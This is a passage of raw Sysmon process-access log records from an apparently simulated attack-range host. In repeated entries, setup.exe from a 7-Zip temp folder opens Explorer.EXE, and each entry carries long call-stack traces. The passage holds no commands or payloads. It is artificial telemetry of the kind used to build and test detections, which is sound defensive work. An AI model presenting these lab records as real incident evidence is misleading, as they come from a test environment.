ows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
